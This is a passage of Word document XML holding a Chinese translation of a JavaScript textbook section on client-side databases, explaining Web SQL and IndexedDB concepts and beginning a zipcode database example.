      </w:pPr>
      <w:r>
        <w:t>var result=f.apply(null,e.data.args);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>postMessage(result);</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564" w:name="22_8_Ke_Hu_Duan_Shu_Ju_Ku_"/>
      <w:r>
        <w:t>22.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　客户端数据库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="564"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传统的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用架构是客户端包含</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>，服务器端包含一个数据库。而通过强大的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5 API</w:t>
      </w:r>
      <w:r>
        <w:t>可以实现客户端数据库。这些不是通过网络访问服务器端数据库的客户端</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，而是真正存储在用户电脑上的客户端数据库，通过浏览器中的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码可以直接访问的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>20.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节介绍过的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>存储</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>可以认为是一种简单的数据库，用于将简单的键</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对形式的数据持久化下来。但是，除此之外，还有两个真正的客户端数据库</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。其中一个叫</w:t>
      </w:r>
      <w:r>
        <w:t>Web SQL</w:t>
      </w:r>
      <w:r>
        <w:t>数据库，它是支持基本</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>查询的简单关</w:t>
      </w:r>
      <w:r>
        <w:t>系数据库。</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>已经实现了该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，但是</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>还没有，并且看起来也不打算实现了。官方标准中关于此</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的工作已经停止了，此功能齐全的</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>数据库或许永远也不会成为官方标准，哪怕是作为</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>平台非官方的交互特性恐怕也不大可能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>目前官方标准已经将注意力转移到了另一种数据库</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，叫做：</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>。介绍关于此</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的详细细节还为时过早（本书第四部分没有对其做相应介绍），但是</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome 11</w:t>
      </w:r>
      <w:r>
        <w:t>已经实现了此</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，同时，本节也包含了一些例子，</w:t>
      </w:r>
      <w:r>
        <w:t>展示了</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB API</w:t>
      </w:r>
      <w:r>
        <w:t>中一些最重要的特性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>是一个对象数据库，而不是关系数据库，它比支持</w:t>
      </w:r>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>查询的数据库简单多了。但是，它要比</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>存储</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>支持的键</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>值对存储更强大、更高效、更健壮。与</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>存储和文件系统</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>一样，</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>数据库的作用域也是限制在包含它们的文档源中：两个同源的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面互相之间可以访问对方的数据，但是非同源的页面则不行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>每个源可以有任意数目的</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>数据库。但是每个数据库的名字在该源下必须是唯一的。在</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB API</w:t>
      </w:r>
      <w:r>
        <w:t>中，一个数</w:t>
      </w:r>
      <w:r>
        <w:t>据库其实就是一个命名对象存储区（</w:t>
      </w:r>
      <w:r>
        <w:t>object store</w:t>
      </w:r>
      <w:r>
        <w:t>）的集合。顾名思义，对象存储区自然存储的是对象（也可以存储任意可以复制的值</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>参见</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>结构性复制</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>）。每个对象都必须有一个键（</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>），通过该键实现在存储区中进行该对象的存储和获取。键必须是唯一的</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>同一个存储区中的两个对象不能有同样的键</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>并且它们必须是按照自然顺序存储，以便于查询。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的字符串、数字和日期对象都可以作为该键。当把一个对象存储到</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>数据库中时，</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>数据库可以为该对象自动生成一个唯</w:t>
      </w:r>
      <w:r>
        <w:t>一的键。不过，通常情况下，存储一个对象的时候，该对象就已经包含一个属性，该属性适合用做键。这种情况下，在创建一个对象存储的时候，可以为该属性指定一条</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>键路径</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。从概念上来说，键路径其实就是一个值，用于告诉数据库如何从一个对象中抽取出该对象的键。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了通过键值从一个对象存储区中获取对象以外，可能还想要能够基于该对象中的其他属性值进行查询。要实现该功能，可以通过在对象存储区上定义索引。（之所以叫</w:t>
      </w:r>
      <w:r>
        <w:t>"IndexedDB"</w:t>
      </w:r>
      <w:r>
        <w:t>就是因为可以在对象存储区上创建索引）。每一个索引就等于是为存储的对象</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>定义了次键。这些索引通常都不</w:t>
      </w:r>
      <w:r>
        <w:t>是唯一的，多个对象也可能匹配一个键值。因此，当通过索引在对象存储区中进行查询的时候，通常需要使用游标（</w:t>
      </w:r>
      <w:r>
        <w:t>cursor</w:t>
      </w:r>
      <w:r>
        <w:t>），它定义一个用于一次一个地获取流查询结果的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。在当需要在对象存储区（或者索引中）查询一定范围的键的时候还可以使用游标，</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB API</w:t>
      </w:r>
      <w:r>
        <w:t>包含一个用于描述键值范围（上限和</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>或下限，开区间或者闭区间）的对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Indexed DB</w:t>
      </w:r>
      <w:r>
        <w:t>提供原子性的保证：对数据库的查询和更新都是包含在一个事务（</w:t>
      </w:r>
      <w:r>
        <w:t>transaction</w:t>
      </w:r>
      <w:r>
        <w:t>）中，以此来确保这些操作要么是一起成功，要么是一起失败，并且永远不会让数据库出</w:t>
      </w:r>
      <w:r>
        <w:t>现更新到一半的情况。</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>中的事务要比很多数据库</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>中的事务简单得多：后面会再次介绍它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从概念上来说，</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB API</w:t>
      </w:r>
      <w:r>
        <w:t>非常简单。要查询或者更新数据库，首先打开该数据库（通过指定名字）。然后，创建一个事务对象，并使用该对象在数据库中通过指定名字查询对象存储区。最后，调用对象存储区的</w:t>
      </w:r>
      <w:r>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来查询对象或者调用</w:t>
      </w:r>
      <w:r>
        <w:t>put()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来存储新的对象。（或者如果要避免覆盖已存在对象的情况，可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>方法）。如果想要查询表示键值范围的对象，通过创建一个</w:t>
      </w:r>
      <w:r>
        <w:t>IDBRange</w:t>
      </w:r>
      <w:r>
        <w:t>对象，并将其传递给</w:t>
      </w:r>
      <w:r>
        <w:t>对象存储区的</w:t>
      </w:r>
      <w:r>
        <w:t>openCursor()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。或者，如果想要使用次键进行查询的话，通过查询对象存储区中的</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>命名索引，然后调用索引对象上的</w:t>
      </w:r>
      <w:r>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:t>方法或者</w:t>
      </w:r>
      <w:r>
        <w:t>openCursor()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>然而，这种概念简易性还是比较复杂的，</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB API</w:t>
      </w:r>
      <w:r>
        <w:t>必须要是异步的，这样能够实现让</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用使用这些</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的同时又不阻塞浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>主线程。（</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>标准定义了一个给</w:t>
      </w:r>
      <w:r>
        <w:t>Worker</w:t>
      </w:r>
      <w:r>
        <w:t>线程使用的同步版本的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，不过，截至撰写本书时，浏览器都没有实现该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，因此这里不做介绍。）创建事务以及查询对象存储区和索引是比较</w:t>
      </w:r>
      <w:r>
        <w:t>简单的同步操作。但是，打开数据库、通过</w:t>
      </w:r>
      <w:r>
        <w:t>put()</w:t>
      </w:r>
      <w:r>
        <w:t>方法更新对象存储区、通过</w:t>
      </w:r>
      <w:r>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:t>方法或</w:t>
      </w:r>
      <w:r>
        <w:t>openCursor()</w:t>
      </w:r>
      <w:r>
        <w:t>查询对象存储区或者索引，这些操作都是异步的。这些异步方法都会立即返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:t>对象。当请求成功或者失败的时候，浏览器会在该</w:t>
      </w:r>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:t>对象上出触发对应的</w:t>
      </w:r>
      <w:r>
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:t>事件或者</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>事件，与此同时，还可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>onsuccess</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:r>
        <w:t>属性来定义事件处理程序。在</w:t>
      </w:r>
      <w:r>
        <w:t>onsuccess</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序中，可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>result</w:t>
      </w:r>
      <w:r>
        <w:t>属性来获取操作的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>异步</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>中一个比较方</w:t>
      </w:r>
      <w:r>
        <w:t>便的特性就是它简化了事务管理。使用</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB API</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，通常是先打开数据库。这是一个异步的操作，因此它会触发</w:t>
      </w:r>
      <w:r>
        <w:t>onsucccess</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序。在该处理程序中，创建一个事务对象，然后使用该事务对象来查询对象存储区或者使用的存</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>储区。之后，调用该对象存储区上的</w:t>
      </w:r>
      <w:r>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>put()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。所有这些操作都是异步的，因此不会立马有结果，但是，通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>put()</w:t>
      </w:r>
      <w:r>
        <w:t>方法生成的请求会自动和事务对象关联。如果需要的话，可以通过调用事务对象的</w:t>
      </w:r>
      <w:r>
        <w:t>abort()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来撤销事务中所有挂起的操作（也可以撤销已</w:t>
      </w:r>
      <w:r>
        <w:t>经完成的操作）。在许多其他的数据库</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>中，事务对象都需要调用</w:t>
      </w:r>
      <w:r>
        <w:t>commit()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来完成事务。然而，在</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>中，在创建该事务对象的原始</w:t>
      </w:r>
      <w:r>
        <w:t>onsuccess</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序退出，并且浏览器返回到事件循环中以及事务中所有挂起的操作都完成之后，就会提交事务（不需要在它们的回调函数中开始新的操作）。这听起来貌似很复杂，事实上，实践起来非常容易。尽管，在查询对象存储区的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB API</w:t>
      </w:r>
      <w:r>
        <w:t>强制要求创建事务对象，但是，通常情况下，不必考虑太多事务问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，还有一种特殊的事务，它是</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r>
        <w:t>中很重要的一部分。通过</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB API</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个新的数据库是很容易的：只需要选个名字然后要求打开该数据库。不过，新的数据库是完全空的，除非将一个或多个对象存储区（索引也可以）添加到该数据库中，否则该数据库只是摆设，毫无用处。创建对象存储区和索引只能在</w:t>
      </w:r>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>onsuccess</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序中完成，</w:t>
      </w:r>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:t>对象是调用数据库对象的</w:t>
      </w:r>
      <w:r>
        <w:t>setVersion()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的。</w:t>
      </w:r>
      <w:r>
        <w:t>setVersion()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>用于指定数据库的版本号</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>通常都是这么用的，每次更改数据库结构的时候就更新该版本号。但是</w:t>
      </w:r>
      <w:r>
        <w:t>，更重要的是，调用</w:t>
      </w:r>
      <w:r>
        <w:t>setVersion()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会隐式地开始一类特殊的事务，在该事务中，允许调用数据库对象的</w:t>
      </w:r>
      <w:r>
        <w:t>createObjectStore()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和对象数据区的</w:t>
      </w:r>
      <w:r>
        <w:t>createIndex()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>有了一定认识，现在应该能够看懂例</w:t>
      </w:r>
      <w:r>
        <w:t>22-15</w:t>
      </w:r>
      <w:r>
        <w:t>了。该例使用</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>来创建和查询一个数据库，该数据库包含美国邮政编码和城市的映射信息。它展示大部分（但非全部）</w:t>
      </w:r>
      <w:r>
        <w:t>IndexDB</w:t>
      </w:r>
      <w:r>
        <w:t>基础特性。截至撰写本书时，该例在</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox 4</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome 11</w:t>
      </w:r>
      <w:r>
        <w:t>中都工作正常，但是，由于</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>的标准也</w:t>
      </w:r>
      <w:r>
        <w:t>未稳定，相应的实现也都是初步的，因此，很有可能当你阅读本书的时候，它就已经无法工作了。但是，不管怎么说，该例总体的结构还是很有用的。例</w:t>
      </w:r>
      <w:r>
        <w:t>22-15</w:t>
      </w:r>
      <w:r>
        <w:t>代码很长，为了能够有助于理解，添加了很多的注释。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>22-15</w:t>
      </w:r>
      <w:r>
        <w:t>：存储美国邮政编码的</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>!DOCTYPE html</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>head</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Zipcode Database</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/title</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>//IndexedDB</w:t>
      </w:r>
      <w:r>
        <w:t>的实现仍然使用</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>前缀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var indexedDB=window.indexedDB||//</w:t>
      </w:r>
      <w:r>
        <w:t>使</w:t>
      </w:r>
      <w:r>
        <w:t>用标准的</w:t>
      </w:r>
      <w:r>
        <w:t>DB API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.mozIndexedDB||//</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>早期版本的</w:t>
      </w:r>
      <w:r>
        <w:t>IndexedDB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>window.webkitIndexedDB;//</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>的早期版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这两个</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:t>没有前缀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var IDBTransaction=window.IDBTransaction||window.webkitIDBTransaction;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var IDBKeyRange=window.IDBKeyRange||window.webkitIDBKeyRange;//</w:t>
      </w:r>
      <w:r>
        <w:t>使用此函</w:t>
      </w:r>
      <w:r>
        <w:t>数，以日志的形式记录发生的数据库错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function logerr(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("IndexedDB error"+e.code+":"+e.message);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
